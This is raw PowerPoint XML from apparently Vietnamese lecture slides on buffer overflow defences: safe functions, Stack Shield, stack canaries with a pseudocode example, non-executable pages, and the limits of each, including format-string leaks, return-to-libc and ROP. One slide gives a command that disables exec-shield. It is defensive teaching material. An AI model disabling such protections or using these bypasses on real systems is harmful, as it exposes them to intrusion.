            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;531;p54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71FF392-B9EF-846D-7A23-E5A009233B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2488450" y="2653702"/>
            <a:ext cx="253750" cy="318098"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10150" h="23424" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="23424"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2079091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BDA0-879D-4E35-9445-9CE7402FF1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buffer Overflow – Phòng chống</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC05241B-9ABD-4171-8F86-506871780E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Secure Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: sử dụng các hàm an toàn có kiểm soát kích th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ớc dữ liệu đầu vào.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>fgets(), strlcpy(), strlcat()…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stack Shield:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>u trữ địa chỉ trả về vào vùng nhớ bảo vệ không thể bị ghi đè</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sao chép địa chỉ trả về từ vùng nhớ bảo vệ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stack Guard: sử dụng các giá trị canh giữ (canary) để phát hiện mã nguồn bị chèn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Non-executable pages: Không cho phép thực thi mã nguồn trong một số loại trang nhớ, ví dụ: stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>sysctl -w kernel.exec-shield=0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vẫn bị khai thác bởi kỹ thuật return-to-libc, return-oriented programming</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{719E6EAD-FA6F-47A2-A66D-38C20E5E8964}"/>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512666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450F-BB5D-4A93-B22D-07942336CEB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sử dụng giá trị canh giữ - Ví dụ </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A34C761-C0BA-4D1E-8479-F3299350ABE3}"/>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249A2B48-6BA4-4D2D-AA10-ADB77AA41F2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="990600"/>
            <a:ext cx="3457575" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>callee()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   int canary = random;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   if(canary!=random)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	//detect attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   else return;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">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DB7F436-AA5F-421B-A175-ACA74A2858AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4452730" y="990600"/>
            <a:ext cx="4267200" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static int random;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caller()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   random = rand();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   callee();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">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8C5C3FAE-8354-4366-9D6F-E7E7DAA60A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3810000"/>
            <a:ext cx="83820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298E5EC4-2AB7-487C-AAF8-1AB546A23FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185735" y="3911600"/>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9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E81B017-F9C5-4AF1-9370-4775AC03B891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7496956" y="3950492"/>
            <a:ext cx="1134513"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&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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4A823688-8B11-4ACC-A483-C784D46B2963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1479190" y="3965207"/>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00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="00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6220ACD-D3E6-4D4E-ABFF-4F03764EB0FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546774" y="457200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a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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086D3568-54A8-4AA6-A3DB-28DD2E058364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3485112" y="3965207"/>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4d 65 21 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>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E85F54F-5ED4-4C66-BD0B-D797FE354D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3956843"/>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b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>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0E2DEF59-E15C-48EA-A9E4-C55FD6CACE71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3602831" y="4572000"/>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canary</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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29DBFA65-78C4-48F0-90D8-B5392CB26D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423865" y="5181600"/>
            <a:ext cx="8382000"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D1A4C4DE-401E-4BFD-8838-2EFD2C265BD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5283200"/>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7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B464D24-53EC-4667-B254-A828CDEA7B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7539821" y="5322092"/>
            <a:ext cx="1134513"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0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;arg1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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F78F0965-F667-4F36-BB74-1B41FD972B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522055" y="5336807"/>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b="1">
              <a:solidFill>
                <a:srgbClr val="0000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C2A4F7FB-4FF6-45B6-8DE1-78FC280BD5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589639" y="5981699"/>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buffer</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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E37D8E63-5A39-4A62-9475-CD63787893AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3527977" y="5336807"/>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4d 65 21 00</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>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64567166-885C-4CC0-85CC-427FF9796CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533899" y="5328443"/>
            <a:ext cx="192508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008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%eip</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E6F5935-7B02-40C4-92EB-0103698B4809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3645696" y="5964376"/>
            <a:ext cx="1938338"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canary</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1F3991-B813-4BDD-9F75-307248E07A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589639" y="5410200"/>
            <a:ext cx="6258961" cy="3239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Buffer Overflow attack</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2715936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2760-33CA-1F19-ADDE-9CA737E7A01B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sử dụng giá trị canh giữ - Hạn chế</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A354CE5E-B9E1-B3A0-EE61-E5C878C59B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Rò rỉ giá trị canh giữ: đối phương ghi đè giá trị canh giữ bằng giá trị của chính nó</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Bất kỳ lỗ hổng nào làm rò rỉ bộ nhớ stack đều cho phép kẻ tấn công xác định được giá trị canh giữ. Ví dụ: lỗ hổng xâu định dạng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Vòng tránh giá trị canh giữ:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Giá trị canh giữ có tác dụng khi các hàm nhận dữ liệu đầu vào ghi dữ liệu liên tục từ địa chỉ thấp đến địa chỉ cao.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Một vài kỹ thuật tấn công cho phép ghi vòng quang giá trị canh giữ:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khai thác lỗ hổng xâu định dạng cho phép ghi vào ô bất kỳ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tràn bộ đệm trong vùng nhớ heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khai thác lỗ hổng trong C++ vtable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công có thể đoán giá trị canh giữ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB925B2B-87AF-C5E0-C73B-3B68FB6C9F35}"/>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859552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476C-59C2-CA67-748A-4AE1B108AA94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Non-executable pages – Hạn chế</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCCA0C5C-4137-F13F-A31A-F51638BC8E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kỹ thuật này không thể ngăn cản kẻ tấn công lợi dụng mã thực thi đã được nạp sẵn trong bộ nhớ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
